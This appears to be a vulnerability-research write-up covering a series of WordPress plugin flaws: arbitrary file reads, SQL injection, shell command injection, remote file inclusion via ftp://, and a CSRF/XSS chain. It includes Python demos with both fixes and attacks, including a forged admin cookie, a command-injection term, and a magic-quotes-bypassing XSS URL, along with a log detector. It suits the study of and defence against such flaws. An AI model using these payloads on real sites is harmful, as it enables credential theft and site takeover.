WordPress Google Document Embedder arbitrary file disclosure

Advisory

Secunia Advisory SA50832

Analysis of vulnerability

Google Document Embedder offers a proxy for forcing a PDF to download rather than opening it in the browser's default handler. It implements this in /libs/pdf.php:

First it checks whether allow_url_fopen is enabled. Then it checks the two variables we need to supply, the “fn” (filename) and “file” GET parameters. If both are present it verifies that the filename ends in .pdf. From there it goes on to decide how to fetch the file, and eventually calls file_get_contents with the “file” GET parameter passed straight in. Note that the filename is only used to pick the name of the returned download on line 45; it is never used to locate the file. Because the code uses file_get_contents whenever it can, we can supply a local path and have it read for us. We can, for instance, fetch wp-config.php like this:


WordPress Duplicator plugin arbitrary file disclosure

Analysis of vulnerability

In version 0.3.0 of the WordPress Duplicator plugin, the files /files/installer.rescue.php and /files/installer.template.php were added for security reasons. They exist to serve the installer file as a download. Both start with this snippet of code:

If the “get” query string parameter is set, it reads the file named by the “file” query string parameter and writes it into the response as installer.php. Because the file is deployed by default on every installation and does not sanitize the “file” parameter, we can use it to read any file the web server can read, with a request like this:


WordPress All Video Gallery Plugin SQL injection vulnerability

Advisory

Secunia Advisory SA50874

Analysis of vulnerability

The All Video Gallery plugin has two pages, playlist.php and /xml/playlist.php, which both take a “vid” ID and output the result of the query as XML.

Note however that the “vid” GET parameter is never sanitized, which means we can inject SQL through it and disclose information from the database with a simple request to either page like this:


WordPress FireStorm Professional Real Estate Plugin SQL Injection vulnerability

Advisory

Secunia Advisory SA 50873

Analysis of vulnerability

The FireStorm Professional Real Estate plugin for WordPress offers functionality for a user to search for real estate by province or country. It is implemented in the file search.php:

By providing either a ProvinceID or a CountryID, we make the application pass the value into one of two SQL queries. In both cases the value is taken directly from the GET parameter without sanitization, which opens it up to a SQL injection through which we can select arbitrary data from the database. For instance, we can select the password hash of a user like this:


WordPress Cimy User Manager arbitrary file disclosure

Advisory

Secunia Advisory SA 50834

Analysis of vulnerability

The Cimy User Manager is meant to export data from WordPress. The file cimy_user_manager.php registers an init action which decides whether or not to serve some content from the site as a download:

First it checks whether the cimy_um_filename POST variable is set. Then it checks whether the Referer is the admin page, which is a flawed way of authenticating the request: the Referer header is supplied by the client and can be set to anything. If it believes you came from the admin page, it attempts to protect against path traversal, but that filter is just as easy to bypass. Let's look at an example.

Take this string: .../...//
Now let's see where ../ matches, with each match in brackets: .[../].[../]/
Removing both matches leaves us with: ../

This tells us that the path traversal “protection” on line 78 can be bypassed trivially: the replacement runs in a single pass, and the characters left behind by the two removed matches recombine into a fresh ../.
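The bypass hinges on str_replace making one left-to-right pass. As an added example (not the plugin's code and not part of the original post), the Python below reproduces that pass, which str.replace performs with the same non-overlapping semantics, and contrasts it with two fixes: repeating the replacement until the string stops changing, and the check a practitioner should actually use, resolving the path and requiring it to stay inside the export directory. It also shows that the filter is what turns the harmless-looking string into a traversal. The export directory name is an assumption.

```python
import os

EXPORT_DIR = "/var/www/wordpress/wp-content/uploads/exports"   # assumed export directory


def strip_dotdot_once(path: str) -> str:
    """One left-to-right, non-overlapping pass: what str_replace("../", "", $p)
    does in PHP. Python's str.replace has the same semantics."""
    return path.replace("../", "")


def strip_dotdot_until_stable(path: str) -> str:
    """Repeat until nothing changes, so the leftover fragments cannot recombine."""
    while "../" in path:
        path = path.replace("../", "")
    return path


def is_confined(base_dir: str, user_path: str) -> bool:
    """The check to use instead of string surgery: resolve the candidate and
    require it to stay inside base_dir. os.path.join drops base_dir when
    user_path is absolute, so absolute paths fail the same comparison."""
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, user_path))
    return candidate == base or candidate.startswith(base + os.sep)


def filtered_is_confined(base_dir: str, user_path: str) -> bool:
    """Where the plugin's filter leaves the request: filtered first, then used."""
    return is_confined(base_dir, strip_dotdot_once(user_path))


if __name__ == "__main__":
    payload = ".../...//wp-config.php"
    print(strip_dotdot_once(payload))          # ../wp-config.php
    print(strip_dotdot_until_stable(payload))  # wp-config.php
    # The raw string stays inside the export directory; the filtered one escapes it.
    print(is_confined(EXPORT_DIR, payload), filtered_is_confined(EXPORT_DIR, payload))
```

The looping variant is only there to show what a minimal fix looks like; rejecting anything whose resolved path leaves the base directory is the check to keep.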

Additionally, if what you want is the wp-config.php file, which contains the database credentials and other very sensitive information about the blog, we do not need to bypass the filter at all: when init is called, the working directory is the WordPress base folder, which contains wp-config.php, so a plain filename is enough. Here's an example request showing how to pull wp-config.php:


WordPress Ungallery remote command injection vulnerability

Analysis of vulnerability

The Ungallery plugin for WordPress offers functionality for searching for pictures in a gallery, which search.php implements by searching the filesystem directly.

Note that the backtick character in PHP has a special meaning, unlike the double quote (") and single quote ('): wrapping something in two backticks runs the contents as a shell command, as if they had been passed to shell_exec. However, the $search variable, taken from the search GET parameter, is never sanitized before it is placed into the backtick expression on line 28. This means we can pull off a remote command injection with a simple request like this:

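What the shell makes of that search string is the whole bug. As an added example (not the plugin's code and not from the original post), the Python below mirrors the pattern in search.php, a user-controlled term concatenated into a command line, tokenizes the result the way a POSIX shell would, and lists the programs that would be started; beside it is the same command with the term quoted, which is what escapeshellarg would do in PHP. The gallery directory and the find command line are assumptions standing in for the original.

```python
import shlex
from typing import List

GALLERY_DIR = "/var/www/wordpress/wp-content/gallery"   # assumed location of the pictures

SHELL_OPERATORS = {";", "|", "||", "&", "&&"}


def vulnerable_command(search: str) -> str:
    """The raw search term is pasted into a command line that the shell will
    parse (PHP backticks behave like shell_exec), so the user owns the syntax."""
    return f"find {GALLERY_DIR} -iname *{search}*"


def hardened_command(search: str) -> str:
    """Same search, but the user-controlled part is quoted so the shell sees one word."""
    return f"find {GALLERY_DIR} -iname {shlex.quote('*' + search + '*')}"


def shell_words(command: str) -> List[str]:
    """Tokenize like a POSIX shell, keeping ; | & as tokens of their own and
    treating an unquoted # as the start of a comment, as the shell does."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    return list(lexer)


def commands_run(command: str) -> List[str]:
    """Name of every program the shell would start for this command line."""
    programs, current = [], []
    for token in shell_words(command):
        if token in SHELL_OPERATORS:
            if current:
                programs.append(current[0])
            current = []
        else:
            current.append(token)
    if current:
        programs.append(current[0])
    return programs


if __name__ == "__main__":
    for term in ("sunset", "x; id #"):
        print(commands_run(vulnerable_command(term)), commands_run(hardened_command(term)))
```

The trailing # in the injected term comments out the closing wildcard that the original template appends, which is why the second program comes out as plain id.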

WordPress Crayon Syntax Highlighter remote file inclusion vulnerability

Advisory

Secunia advisory SA 50804

Analysis of vulnerability

The Crayon Syntax Highlighter implements a vulnerable RPC-like system for AJAX in /util/ajax.php and /util/preview.php. Both files begin with the same three lines of code:

So it appears that it at least attempts some validation. Let us see how that is implemented in global.php (included by crayon_wp.class.php):

So it calls crayon_is_php_file, which checks that the provided path is a file, that the extension is “php” and that the filename is the expected one, in this case wp-load.php. In theory this should be safe, if we assume that is_file only returns true for local files. However, is_file also works through PHP's ftp:// stream wrapper, so we can make it return true for a file on a remote FTP server. This means that if the server allows URL includes (allow_url_include), we can perform a remote file include from a malicious FTP server hosting a wp-load.php file, through either ajax.php or preview.php, with a URL like this:

http://192.168.80.130/wordpress/wp-content/plugins/crayon-syntax-highlighter/util/ajax.php?wp_load=ftp://192.168.80.201/wp-load.php
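The lesson from crayon_is_php_file is that extension and basename checks say nothing about where a path points, and that PHP's filesystem functions happily accept stream-wrapper URLs. As an added example, not the plugin's code, the Python below shows the check a wp_load-style parameter should get instead: refuse anything carrying a scheme, resolve the path, require it to be wp-load.php sitting directly inside the WordPress root, and only then test that it exists. The FTP host is the one from the URL above; the WordPress root is a temporary directory the example creates, with a planted copy under uploads/ to show why the parent-directory check matters.

```python
import os
import tempfile
from typing import Tuple
from urllib.parse import urlsplit

EXPECTED_NAME = "wp-load.php"


def wrapper_scheme(path: str) -> str:
    """Scheme of a stream-wrapper URL ("ftp", "php", "http", "data", ...), or ""
    for a plain filesystem path. A one-letter scheme is a Windows drive letter."""
    scheme = urlsplit(path).scheme.lower()
    return scheme if len(scheme) > 1 else ""


def is_safe_wp_load(candidate: str, wp_root: str) -> bool:
    """Accept only the real wp-load.php that sits directly in wp_root."""
    if wrapper_scheme(candidate):
        return False                      # ftp://, php://, http:// and friends never qualify
    root = os.path.realpath(wp_root)
    # os.path.join discards root when candidate is absolute, and realpath
    # normalises ../ and symlinks, so the comparison below sees the final path.
    resolved = os.path.realpath(os.path.join(root, candidate))
    if os.path.dirname(resolved) != root:
        return False                      # outside the root, or in a subdirectory such as uploads/
    if os.path.basename(resolved) != EXPECTED_NAME:
        return False
    return os.path.isfile(resolved)       # existence is the last check, not the first


def make_fake_wp_root() -> Tuple[str, str, str]:
    """Constructed layout for the demo: a WordPress root holding the genuine
    wp-load.php and an attacker-planted copy under uploads/.
    Returns (root, genuine, planted)."""
    root = tempfile.mkdtemp(prefix="wp-demo-")
    genuine = os.path.join(root, EXPECTED_NAME)
    planted = os.path.join(root, "uploads", EXPECTED_NAME)
    os.mkdir(os.path.dirname(planted))
    for path in (genuine, planted):
        with open(path, "w") as fh:
            fh.write("<?php /* constructed stand-in */\n")
    return root, genuine, planted


REMOTE_WP_LOAD = "ftp://192.168.80.201/wp-load.php"   # the URL from the walk-through above

if __name__ == "__main__":
    root, genuine, planted = make_fake_wp_root()
    for candidate in (genuine, planted, REMOTE_WP_LOAD, "php://filter/resource=" + genuine):
        print(is_safe_wp_load(candidate, root), candidate)
```

Rejecting on scheme first also closes php://, data:// and similar wrappers, which PHP's is_file does not distinguish from disk paths any better than it distinguishes ftp://.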

WordPress Zingiri Shop SQL injection vulnerabilities

Advisory
Secunia Advisory SA 49398

Analysis of vulnerability

This vulnerability stems from a lack of validation of the fws_cust cookie in the Zingiri Web Shop's IsAdmin function in /fws/includes/subs.inc.php. The method tries to determine whether the user is an admin like this:

It splits (explode!) the fws_cust cookie on the # character, extracts an MD5 password hash and a user ID, and then fetches the corresponding user from the database. Notice however on lines 232 and 235 that it does not sanitize the input, leading to SQL injection. We can abuse this to forge a cookie which gives us admin rights, using this simple Python script:

Numerous other vulnerabilities using the same attack vector, the result of copy-and-paste, were fixed at the same time. They can be found quite easily and exploited the same way.
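Every SQL injection on this page so far (the vid, ProvinceID/CountryID and fws_cust cases) comes from the same habit: a request value dropped straight into the query text. As an added example, not the plugin's code and not the script the post refers to, the Python below models IsAdmin against an in-memory SQLite table, forges the kind of cookie described above, and shows a parameterised version refusing it. The table layout, the cookie order (MD5 hash first, then user ID) and the exact WHERE clause are assumptions, since the original query is not reproduced here; the forged value has to be adjusted to the real query. Note the trailing space after the comment marker, which MySQL requires for `-- ` to start a comment.

```python
import hashlib
import sqlite3


def build_demo_db() -> sqlite3.Connection:
    """Constructed stand-in for the shop's customer table (layout assumed)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE customers (id INTEGER PRIMARY KEY, password TEXT, is_admin INTEGER)")
    db.executemany(
        "INSERT INTO customers VALUES (?, ?, ?)",
        [(1, hashlib.md5(b"s3cret-admin").hexdigest(), 1),
         (2, hashlib.md5(b"customer").hexdigest(), 0)],
    )
    return db


def legit_cookie(password: str, user_id: int) -> str:
    """Cookie layout assumed from the description: md5(password) '#' user id."""
    return f"{hashlib.md5(password.encode()).hexdigest()}#{user_id}"


def split_cookie(cookie: str):
    parts = cookie.split("#")            # explode('#', $cookie)
    return parts if len(parts) == 2 else None


def vulnerable_sql(cookie: str) -> str:
    """Both cookie halves end up inside the query text, as on lines 232 and 235."""
    pw_md5, user_id = split_cookie(cookie)
    return f"SELECT is_admin FROM customers WHERE id = {user_id} AND password = '{pw_md5}'"


def vulnerable_is_admin(db: sqlite3.Connection, cookie: str) -> bool:
    if split_cookie(cookie) is None:
        return False
    row = db.execute(vulnerable_sql(cookie)).fetchone()
    return bool(row and row[0])


def fixed_is_admin(db: sqlite3.Connection, cookie: str) -> bool:
    """Validate the shape, then bind the values; the query text never changes."""
    parts = split_cookie(cookie)
    if parts is None or not parts[1].isdigit() or len(parts[0]) != 32:
        return False
    row = db.execute(
        "SELECT is_admin FROM customers WHERE id = ? AND password = ?",
        (int(parts[1]), parts[0]),
    ).fetchone()
    return bool(row and row[0])


def forge_admin_cookie() -> str:
    """The hash half is irrelevant once the id half rewrites the WHERE clause:
    '0 OR is_admin = 1' selects an admin row and '-- ' comments out the password test."""
    return "0#0 OR is_admin = 1 -- "


if __name__ == "__main__":
    db = build_demo_db()
    print(vulnerable_sql(forge_admin_cookie()))
    print(vulnerable_is_admin(db, forge_admin_cookie()), fixed_is_admin(db, forge_admin_cookie()))
```

Against a real target the cookie goes out as `Cookie: fws_cust=<value>` with the value URL-encoded; the point of the parameterised version is that the id half can no longer change the shape of the statement, whatever it contains.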

WordPress GD Star Rating information disclosure vulnerability

Advisory
Secunia Advisory SA 49850

Analysis
The GD Star Rating plugin “allows you to set up advanced rating and review system for post types and comments in your blog using single, multi and thumbs ratings”. Through its admin interface you can export some data, such as T2 templates and votes. The interesting thing it allows you to do is export user data. This includes user ID, username, user email address, which vote was cast on which post, when the vote was cast, IP address and user agent. However, a flaw in export.php allows all of this to be disclosed to anyone who asks.

The file imports some configuration and the export classes, and then works out what to export. It takes the “ex” value to determine the export type, “de” for which data to export (article or comment data), and “us” for how much data to export.

It calls into the export_users function in /cls/export.php:

Here we see it takes the “de”, “us” and further GET parameters and starts building up a SQL query. What we notice is that at no point so far have we seen any validation that the calling user is an admin. We also notice that it checks the GET parameters “ip” and “ua”, which toggle whether the IP address and user agent information are returned.

Because of the missing check on the calling user, we can craft an extremely simple request which exports this data in clear text, including username, email, IP address and user agent.
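Since export.php has no authorisation check, any hit on it from a non-admin is worth a look, and the same goes for the other request shapes on this page. As an added example that is not part of the original post, the Python below runs a few detection rules over constructed Apache access-log lines: an unauthenticated export, a ../ traversal in a query value, a stream-wrapper URL in a query value, a UNION SELECT, and shell metacharacters in a search term. The log lines, hosts, plugin directory names and parameter values are all constructed for the demo.

```python
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

# Constructed Apache combined-format lines; hosts, paths and values are illustrative.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2012:13:55:36 +0200] "GET /wordpress/wp-content/plugins/gd-star-rating/export.php?ex=users&de=articles&us=all&ip=1&ua=1 HTTP/1.1" 200 5123 "-" "curl/7.26.0"
10.0.0.5 - - [10/Oct/2012:13:56:01 +0200] "GET /wordpress/wp-content/plugins/google-document-embedder/libs/pdf.php?fn=x.pdf&file=../../../../wp-config.php HTTP/1.1" 200 3011 "-" "curl/7.26.0"
10.0.0.5 - - [10/Oct/2012:13:56:40 +0200] "GET /wordpress/wp-content/plugins/crayon-syntax-highlighter/util/ajax.php?wp_load=ftp://192.168.80.201/wp-load.php HTTP/1.1" 200 77 "-" "curl/7.26.0"
10.0.0.9 - - [10/Oct/2012:14:01:12 +0200] "GET /wordpress/wp-content/plugins/all-video-gallery/xml/playlist.php?vid=3 HTTP/1.1" 200 880 "http://192.168.80.130/wordpress/" "Mozilla/5.0"
10.0.0.5 - - [10/Oct/2012:14:02:03 +0200] "GET /wordpress/wp-content/plugins/all-video-gallery/xml/playlist.php?vid=3%20UNION%20SELECT%201,2,3 HTTP/1.1" 200 1440 "-" "curl/7.26.0"
10.0.0.9 - - [10/Oct/2012:14:05:55 +0200] "GET /wordpress/wp-content/plugins/ungallery/search.php?search=sunset HTTP/1.1" 200 2210 "http://192.168.80.130/wordpress/" "Mozilla/5.0"
10.0.0.5 - - [10/Oct/2012:14:06:10 +0200] "GET /wordpress/wp-content/plugins/ungallery/search.php?search=x%3B+id+%23 HTTP/1.1" 200 90 "-" "curl/7.26.0"
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
SQL_RE = re.compile(r"(?i)\bunion\b\s+(all\s+)?\bselect\b|'\s*(or|and)\s|--\s|/\*")
WRAPPER_RE = re.compile(r"(?i)^(ftp|https?|php|data|expect|phar)://")
SHELL_META = set(";|&`$")


def parse_request(line: str) -> Optional[Tuple[str, Dict[str, List[str]]]]:
    """Pull path and decoded query parameters out of the request field."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    target = urlsplit(match.group("target"))
    return target.path, parse_qs(target.query, keep_blank_values=True)   # parse_qs URL-decodes


def classify(line: str) -> List[str]:
    """Tags for one log line; an empty list means nothing matched."""
    parsed = parse_request(line)
    if parsed is None:
        return []
    path, query = parsed
    values = [v for vs in query.values() for v in vs]
    tags = []
    if path.endswith("/gd-star-rating/export.php"):
        tags.append("gdsr-export")         # no admin check on the endpoint, so every hit deserves review
    if any(".." in v for v in values):
        tags.append("path-traversal")
    if any(WRAPPER_RE.match(v) for v in values):
        tags.append("stream-wrapper")
    if any(SQL_RE.search(v) for v in values):
        tags.append("sql-injection")
    if any(SHELL_META & set(v) for v in values):
        tags.append("shell-metachars")
    return tags


def scan(log_text: str) -> Dict[int, List[str]]:
    """Line number -> tags, for every line that matched at least one rule."""
    hits = {}
    for number, line in enumerate(log_text.splitlines(), 1):
        tags = classify(line)
        if tags:
            hits[number] = tags
    return hits


if __name__ == "__main__":
    for number, tags in scan(SAMPLE_LOG).items():
        print(number, ", ".join(tags))
```

The rules are deliberately narrow; the traversal and wrapper checks in particular match what the file-disclosure and Crayon sections describe rather than every possible encoding, so treat the output as a starting point for review, not a verdict.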

WordPress Flexi Quote Rotator plugin multiple vulnerabilities

Advisory
Secunia Advisory SA 49910

Analysis
The admin interface of the Flexi Quote Rotator plugin for WordPress implements quote editing through the displayManagementPage function in /classes/quote-rotator-management.class.php.

It first checks the action GET parameter. If it is “edit”, it concatenates the “id” GET parameter into a SQL query and writes the result out to the page. But it does not sanitize the “id” GET parameter, which causes a SQL injection. This code can also be invoked without a nonce, which makes it vulnerable to CSRF. Additionally, while it output-encodes the author and quote columns, it does not encode the ID. This gives us two options for exploiting these three vulnerabilities:

  • Chaining the SQL injection and the XSS to execute JavaScript in the admin's browser
  • Chaining the SQL injection and the CSRF to execute arbitrary SQL blindly

Here is an example of the former, where we trick the admin user into clicking our specially crafted URL:

The hex value we use to bypass the magic quotes which WordPress enforces was generated this way:
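The post's own generator snippet is not reproduced above. As an added example of the same idea, not the original code, the Python below shows what magic quotes do to a payload (WordPress's wp_magic_quotes() applies addslashes to every request value), why a MySQL hex literal is immune, and how the literal is dropped into the id parameter for the SQL-injection-plus-XSS chain. The three-column UNION, the admin page URL and the page slug are assumptions; the real column count has to be determined on the target.

```python
from typing import List
from urllib.parse import urlencode

XSS = "<script>alert(document.cookie)</script>"   # constructed payload for the demo


def php_addslashes(value: str) -> str:
    """What magic quotes do to every GET/POST/COOKIE value: a backslash
    before single quote, double quote, backslash and NUL."""
    out = []
    for ch in value:
        if ch in "'\"\\":
            out.append("\\" + ch)
        elif ch == "\x00":
            out.append("\\0")
        else:
            out.append(ch)
    return "".join(out)


def mysql_hex_literal(text: str) -> str:
    """0x3c7363...: MySQL reads an unquoted hex literal as the string with those
    bytes, so the payload never contains a quote for addslashes to escape."""
    return "0x" + text.encode("utf-8").hex()


def decode_hex_literal(literal: str) -> str:
    """Reverse it, to check what the database will actually hand back."""
    return bytes.fromhex(literal[2:]).decode("utf-8")


def survives_magic_quotes(payload: str) -> bool:
    return php_addslashes(payload) == payload


def craft_id_parameter(payload: str, columns: int = 3) -> str:
    """Assumed shape: an impossible id suppresses the real row and the UNION puts
    the hex literal in the first column, the one the page echoes without encoding."""
    values: List[str] = [mysql_hex_literal(payload)] + [str(n) for n in range(2, columns + 1)]
    return "-1 UNION SELECT " + ",".join(values)


def craft_admin_url(payload: str, columns: int = 3,
                    base: str = "http://192.168.80.130/wordpress/wp-admin/admin.php",
                    page: str = "flexi-quote-rotator") -> str:
    """The link the admin is tricked into opening (base URL and page slug assumed)."""
    query = urlencode({"page": page, "action": "edit", "id": craft_id_parameter(payload, columns)})
    return base + "?" + query


if __name__ == "__main__":
    quoted = "'" + XSS + "'"
    print(php_addslashes(quoted))                 # the quoted form comes out mangled
    print(mysql_hex_literal(XSS))                 # the hex form passes through untouched
    print(craft_admin_url(XSS))
```

A quoted string in the same position would arrive with every quote escaped and break the query, which is exactly what magic quotes were meant to achieve; the hex literal sidesteps it because it never needed quotes.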